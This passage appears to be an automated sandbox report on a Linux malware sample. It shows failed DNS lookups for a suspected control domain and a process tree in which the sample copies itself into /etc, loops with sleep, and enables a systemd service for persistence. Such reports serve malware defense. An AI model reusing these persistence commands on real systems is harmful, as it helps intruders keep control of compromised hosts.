Nov 2, 2024 04:06:21.729346991 CET	1.1.1.1	192.168.2.15	0x626e	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:22.741151094 CET	1.1.1.1	192.168.2.15	0xe325	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:22.741307020 CET	1.1.1.1	192.168.2.15	0x6088	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:22.748029947 CET	1.1.1.1	192.168.2.15	0x6088	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:22.748042107 CET	1.1.1.1	192.168.2.15	0xe325	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:23.764523983 CET	1.1.1.1	192.168.2.15	0xf00	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:23.764727116 CET	1.1.1.1	192.168.2.15	0x17d3	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:23.771174908 CET	1.1.1.1	192.168.2.15	0xf00	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:23.771363974 CET	1.1.1.1	192.168.2.15	0x17d3	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:24.786763906 CET	1.1.1.1	192.168.2.15	0x69f7	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:24.786787987 CET	1.1.1.1	192.168.2.15	0xa0de	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:24.793617010 CET	1.1.1.1	192.168.2.15	0xa0de	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:25.154802084 CET	1.1.1.1	192.168.2.15	0x69f7	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:26.167643070 CET	1.1.1.1	192.168.2.15	0xd7d8	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:26.167763948 CET	1.1.1.1	192.168.2.15	0x5cb	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:26.174323082 CET	1.1.1.1	192.168.2.15	0xd7d8	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:26.174350977 CET	1.1.1.1	192.168.2.15	0x5cb	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:27.191082954 CET	1.1.1.1	192.168.2.15	0x88ab	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:27.191262960 CET	1.1.1.1	192.168.2.15	0xd316	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:27.197926044 CET	1.1.1.1	192.168.2.15	0x88ab	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:27.197949886 CET	1.1.1.1	192.168.2.15	0xd316	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:28.216932058 CET	1.1.1.1	192.168.2.15	0x9693	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:28.217034101 CET	1.1.1.1	192.168.2.15	0x75ec	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:28.223858118 CET	1.1.1.1	192.168.2.15	0x9693	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:28.223867893 CET	1.1.1.1	192.168.2.15	0x75ec	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:29.240488052 CET	1.1.1.1	192.168.2.15	0x540c	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:29.240788937 CET	1.1.1.1	192.168.2.15	0x2ce3	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:29.247208118 CET	1.1.1.1	192.168.2.15	0x540c	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:29.247448921 CET	1.1.1.1	192.168.2.15	0x2ce3	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:30.263389111 CET	1.1.1.1	192.168.2.15	0x8b61	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:30.264636993 CET	1.1.1.1	192.168.2.15	0x8b20	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:30.270183086 CET	1.1.1.1	192.168.2.15	0x8b61	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:30.271280050 CET	1.1.1.1	192.168.2.15	0x8b20	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:31.285732985 CET	1.1.1.1	192.168.2.15	0x5c8a	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:31.286111116 CET	1.1.1.1	192.168.2.15	0xa0d5	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:31.292435884 CET	1.1.1.1	192.168.2.15	0x5c8a	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:31.292710066 CET	1.1.1.1	192.168.2.15	0xa0d5	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:32.310252905 CET	1.1.1.1	192.168.2.15	0xad5f	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:32.311717987 CET	1.1.1.1	192.168.2.15	0x7381	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:32.316992044 CET	1.1.1.1	192.168.2.15	0xad5f	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:32.318581104 CET	1.1.1.1	192.168.2.15	0x7381	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:33.332818031 CET	1.1.1.1	192.168.2.15	0x816b	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:33.333133936 CET	1.1.1.1	192.168.2.15	0xf043	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:33.339476109 CET	1.1.1.1	192.168.2.15	0x816b	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:33.339669943 CET	1.1.1.1	192.168.2.15	0xf043	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:34.355283976 CET	1.1.1.1	192.168.2.15	0xd375	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:34.355611086 CET	1.1.1.1	192.168.2.15	0xd813	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:34.361974955 CET	1.1.1.1	192.168.2.15	0xd375	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:34.362103939 CET	1.1.1.1	192.168.2.15	0xd813	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:35.375247002 CET	1.1.1.1	192.168.2.15	0xbbb9	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:35.377198935 CET	1.1.1.1	192.168.2.15	0x2bdf	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:35.382051945 CET	1.1.1.1	192.168.2.15	0xbbb9	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:35.383806944 CET	1.1.1.1	192.168.2.15	0x2bdf	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:36.399573088 CET	1.1.1.1	192.168.2.15	0x5054	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:36.399719000 CET	1.1.1.1	192.168.2.15	0x27f7	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:37.017277956 CET	1.1.1.1	192.168.2.15	0x5054	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:38.033919096 CET	1.1.1.1	192.168.2.15	0x4c1b	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:38.040673971 CET	1.1.1.1	192.168.2.15	0x4c1b	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:38.118704081 CET	1.1.1.1	192.168.2.15	0xb733	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:38.126451969 CET	1.1.1.1	192.168.2.15	0xb733	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:39.144778967 CET	1.1.1.1	192.168.2.15	0x40c8	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:39.145581961 CET	1.1.1.1	192.168.2.15	0x1f80	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:39.151359081 CET	1.1.1.1	192.168.2.15	0x40c8	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:39.278827906 CET	1.1.1.1	192.168.2.15	0x1f80	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:40.295715094 CET	1.1.1.1	192.168.2.15	0x2927	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:40.295850992 CET	1.1.1.1	192.168.2.15	0xa79f	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:40.302385092 CET	1.1.1.1	192.168.2.15	0x2927	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:40.302563906 CET	1.1.1.1	192.168.2.15	0xa79f	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:41.320477009 CET	1.1.1.1	192.168.2.15	0x65a7	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:41.321006060 CET	1.1.1.1	192.168.2.15	0x9937	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:41.334994078 CET	1.1.1.1	192.168.2.15	0x65a7	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:41.335700035 CET	1.1.1.1	192.168.2.15	0x9937	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:42.350055933 CET	1.1.1.1	192.168.2.15	0xced6	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:42.350255013 CET	1.1.1.1	192.168.2.15	0x4f94	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:42.356651068 CET	1.1.1.1	192.168.2.15	0xced6	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:42.356853962 CET	1.1.1.1	192.168.2.15	0x4f94	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:43.370699883 CET	1.1.1.1	192.168.2.15	0x75e0	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:43.371644974 CET	1.1.1.1	192.168.2.15	0x1048	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:43.377610922 CET	1.1.1.1	192.168.2.15	0x75e0	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:43.378364086 CET	1.1.1.1	192.168.2.15	0x1048	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:44.393101931 CET	1.1.1.1	192.168.2.15	0x424a	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:44.393615007 CET	1.1.1.1	192.168.2.15	0x9134	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:44.399837017 CET	1.1.1.1	192.168.2.15	0x424a	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:44.400424957 CET	1.1.1.1	192.168.2.15	0x9134	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:45.417548895 CET	1.1.1.1	192.168.2.15	0x1ff2	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:45.418246984 CET	1.1.1.1	192.168.2.15	0xd64c	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:45.424377918 CET	1.1.1.1	192.168.2.15	0x1ff2	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:45.424844027 CET	1.1.1.1	192.168.2.15	0xd64c	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:46.441883087 CET	1.1.1.1	192.168.2.15	0xda16	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:46.442454100 CET	1.1.1.1	192.168.2.15	0x1fb6	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:46.448612928 CET	1.1.1.1	192.168.2.15	0xda16	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:46.449182034 CET	1.1.1.1	192.168.2.15	0x1fb6	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:47.466917038 CET	1.1.1.1	192.168.2.15	0x2d4c	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:47.467071056 CET	1.1.1.1	192.168.2.15	0x384b	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:47.473824978 CET	1.1.1.1	192.168.2.15	0x2d4c	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:47.599733114 CET	1.1.1.1	192.168.2.15	0x384b	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:48.614686966 CET	1.1.1.1	192.168.2.15	0xf3d9	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:48.614824057 CET	1.1.1.1	192.168.2.15	0x356b	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:48.621313095 CET	1.1.1.1	192.168.2.15	0xf3d9	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:48.747267008 CET	1.1.1.1	192.168.2.15	0x356b	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:49.762666941 CET	1.1.1.1	192.168.2.15	0x1750	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:49.763325930 CET	1.1.1.1	192.168.2.15	0x52c3	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:49.770004034 CET	1.1.1.1	192.168.2.15	0x52c3	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:49.895587921 CET	1.1.1.1	192.168.2.15	0x1750	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:50.910764933 CET	1.1.1.1	192.168.2.15	0x107b	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:50.912566900 CET	1.1.1.1	192.168.2.15	0xf1d5	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:50.917579889 CET	1.1.1.1	192.168.2.15	0x107b	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:50.919230938 CET	1.1.1.1	192.168.2.15	0xf1d5	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:51.933161974 CET	1.1.1.1	192.168.2.15	0x3cf	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:51.933319092 CET	1.1.1.1	192.168.2.15	0xbecf	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:51.939902067 CET	1.1.1.1	192.168.2.15	0x3cf	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:51.940025091 CET	1.1.1.1	192.168.2.15	0xbecf	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:52.954052925 CET	1.1.1.1	192.168.2.15	0x2f17	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:52.956129074 CET	1.1.1.1	192.168.2.15	0x4d96	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:06:52.960977077 CET	1.1.1.1	192.168.2.15	0x2f17	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:52.962889910 CET	1.1.1.1	192.168.2.15	0x4d96	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false

System Behavior

Analysis Process: utZX7JAuMU.elf PID: 5537, Parent PID: 5465

General

Start time (UTC):	03:04:48
Start date (UTC):	02/11/2024
Path:	/tmp/utZX7JAuMU.elf
Arguments:	/tmp/utZX7JAuMU.elf
File size:	5706200 bytes
MD5 hash:	02e8e39e1b46472a60d128a6da84a2b8

Chronological Activities

Analysis Process: utZX7JAuMU.elf PID: 5542, Parent PID: 5537

General

Start time (UTC):	03:04:48
Start date (UTC):	02/11/2024
Path:	/tmp/utZX7JAuMU.elf
Arguments:	-
File size:	5706200 bytes
MD5 hash:	02e8e39e1b46472a60d128a6da84a2b8

Chronological Activities

Analysis Process: utZX7JAuMU.elf PID: 5542, Parent PID: 5537

General

Start time (UTC):	03:04:48
Start date (UTC):	02/11/2024
Path:	/tmp/utZX7JAuMU.elf
Arguments:	/tmp/utZX7JAuMU.elf
File size:	5706200 bytes
MD5 hash:	02e8e39e1b46472a60d128a6da84a2b8

Chronological Activities

Analysis Process: utZX7JAuMU.elf PID: 5551, Parent PID: 5542

General

Start time (UTC):	03:04:50
Start date (UTC):	02/11/2024
Path:	/tmp/utZX7JAuMU.elf
Arguments:	-
File size:	5706200 bytes
MD5 hash:	02e8e39e1b46472a60d128a6da84a2b8

Chronological Activities

Analysis Process: bash PID: 5551, Parent PID: 5542

General

Start time (UTC):	03:04:50
Start date (UTC):	02/11/2024
Path:	/bin/bash
Arguments:	/bin/bash -c /etc/32676&
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: bash PID: 5557, Parent PID: 5551

General

Start time (UTC):	03:04:50
Start date (UTC):	02/11/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: 32676 PID: 5557, Parent PID: 3044

General

Start time (UTC):	03:04:50
Start date (UTC):	02/11/2024
Path:	/etc/32676
Arguments:	/etc/32676
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: 32676 PID: 5564, Parent PID: 5557

General

Start time (UTC):	03:04:50
Start date (UTC):	02/11/2024
Path:	/etc/32676
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: sleep PID: 5564, Parent PID: 5557

General

Start time (UTC):	03:04:50
Start date (UTC):	02/11/2024
Path:	/usr/bin/sleep
Arguments:	sleep 60
File size:	39256 bytes
MD5 hash:	fcba58db24e5e3672c4d70a3bb01d7a4

Chronological Activities

Analysis Process: 32676 PID: 5746, Parent PID: 5557

General

Start time (UTC):	03:05:50
Start date (UTC):	02/11/2024
Path:	/etc/32676
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: 32676 PID: 5748, Parent PID: 5557

General

Start time (UTC):	03:05:50
Start date (UTC):	02/11/2024
Path:	/etc/32676
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: sleep PID: 5748, Parent PID: 5557

General

Start time (UTC):	03:05:50
Start date (UTC):	02/11/2024
Path:	/usr/bin/sleep
Arguments:	sleep 60
File size:	39256 bytes
MD5 hash:	fcba58db24e5e3672c4d70a3bb01d7a4

Chronological Activities

Analysis Process: 32676 PID: 5807, Parent PID: 5557

General

Start time (UTC):	03:06:50
Start date (UTC):	02/11/2024
Path:	/etc/32676
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: 32676 PID: 5809, Parent PID: 5557

General

Start time (UTC):	03:06:50
Start date (UTC):	02/11/2024
Path:	/etc/32676
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: sleep PID: 5809, Parent PID: 5557

General

Start time (UTC):	03:06:50
Start date (UTC):	02/11/2024
Path:	/usr/bin/sleep
Arguments:	sleep 60
File size:	39256 bytes
MD5 hash:	fcba58db24e5e3672c4d70a3bb01d7a4

Chronological Activities

Analysis Process: utZX7JAuMU.elf PID: 5558, Parent PID: 5542

General

Start time (UTC):	03:04:50
Start date (UTC):	02/11/2024
Path:	/tmp/utZX7JAuMU.elf
Arguments:	-
File size:	5706200 bytes
MD5 hash:	02e8e39e1b46472a60d128a6da84a2b8

Chronological Activities

Analysis Process: service PID: 5558, Parent PID: 5542

General

Start time (UTC):	03:04:50
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	service crond start
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: service PID: 5563, Parent PID: 5558

General

Start time (UTC):	03:04:50
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: basename PID: 5563, Parent PID: 5558

General

Start time (UTC):	03:04:50
Start date (UTC):	02/11/2024
Path:	/usr/bin/basename
Arguments:	basename /usr/sbin/service
File size:	39256 bytes
MD5 hash:	3283660e59f128df18bec9b96fbd4d41

Chronological Activities

Analysis Process: service PID: 5565, Parent PID: 5558

General

Start time (UTC):	03:04:50
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: basename PID: 5565, Parent PID: 5558

General

Start time (UTC):	03:04:50
Start date (UTC):	02/11/2024
Path:	/usr/bin/basename
Arguments:	basename /usr/sbin/service
File size:	39256 bytes
MD5 hash:	3283660e59f128df18bec9b96fbd4d41

Chronological Activities

Analysis Process: service PID: 5566, Parent PID: 5558

General

Start time (UTC):	03:04:50
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: systemctl PID: 5566, Parent PID: 5558

General

Start time (UTC):	03:04:50
Start date (UTC):	02/11/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl --quiet is-active multi-user.target
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: service PID: 5567, Parent PID: 5558

General

Start time (UTC):	03:04:50
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: service PID: 5568, Parent PID: 5567

General

Start time (UTC):	03:04:50
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: systemctl PID: 5568, Parent PID: 5567

General

Start time (UTC):	03:04:50
Start date (UTC):	02/11/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl list-unit-files --full --type=socket
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: service PID: 5569, Parent PID: 5567

General

Start time (UTC):	03:04:50
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sed PID: 5569, Parent PID: 5567

General

Start time (UTC):	03:04:50
Start date (UTC):	02/11/2024
Path:	/usr/bin/sed
Arguments:	sed -ne s/\\.socket\\s[a-z]\\s*$/.socket/p
File size:	121288 bytes
MD5 hash:	885062561f66aa1d4af4c54b9e7cc81a

Chronological Activities

Analysis Process: systemctl PID: 5558, Parent PID: 5542

General

Start time (UTC):	03:04:52
Start date (UTC):	02/11/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl start crond.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: utZX7JAuMU.elf PID: 5570, Parent PID: 5542

General

Start time (UTC):	03:04:52
Start date (UTC):	02/11/2024
Path:	/tmp/utZX7JAuMU.elf
Arguments:	-
File size:	5706200 bytes
MD5 hash:	02e8e39e1b46472a60d128a6da84a2b8

Chronological Activities

Analysis Process: bash PID: 5570, Parent PID: 5542

General

Start time (UTC):	03:04:52
Start date (UTC):	02/11/2024
Path:	/bin/bash
Arguments:	/bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable quotaoff.service;systemctl start quotaoff.service;journalctl -xe --no-pager"
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: bash PID: 5572, Parent PID: 5570

General

Start time (UTC):	03:04:52
Start date (UTC):	02/11/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: systemctl PID: 5572, Parent PID: 5570

General

Start time (UTC):	03:04:52
Start date (UTC):	02/11/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl daemon-reload
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: bash PID: 5576, Parent PID: 5570

General

Start time (UTC):	03:04:52
Start date (UTC):	02/11/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: systemctl PID: 5576, Parent PID: 5570

General

Start time (UTC):	03:04:52
Start date (UTC):	02/11/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl enable quotaoff.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: bash PID: 5580, Parent PID: 5570

General

Start time (UTC):	03:04:52
Start date (UTC):	02/11/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: systemctl PID: 5580, Parent PID: 5570

General

Start time (UTC):	03:04:52
Start date (UTC):	02/11/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl start quotaoff.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: bash PID: 5593, Parent PID: 5570

General

Start time (UTC):	03:04:52
Start date (UTC):	02/11/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: journalctl PID: 5593, Parent PID: 5570

General

Start time (UTC):	03:04:52
Start date (UTC):	02/11/2024
Path:	/usr/bin/journalctl
Arguments:	journalctl -xe --no-pager
File size:	80120 bytes
MD5 hash:	bf3a987344f3bacafc44efd882abda8b

Chronological Activities

Analysis Process: utZX7JAuMU.elf PID: 5598, Parent PID: 5542

General

Start time (UTC):	03:04:53
Start date (UTC):	02/11/2024
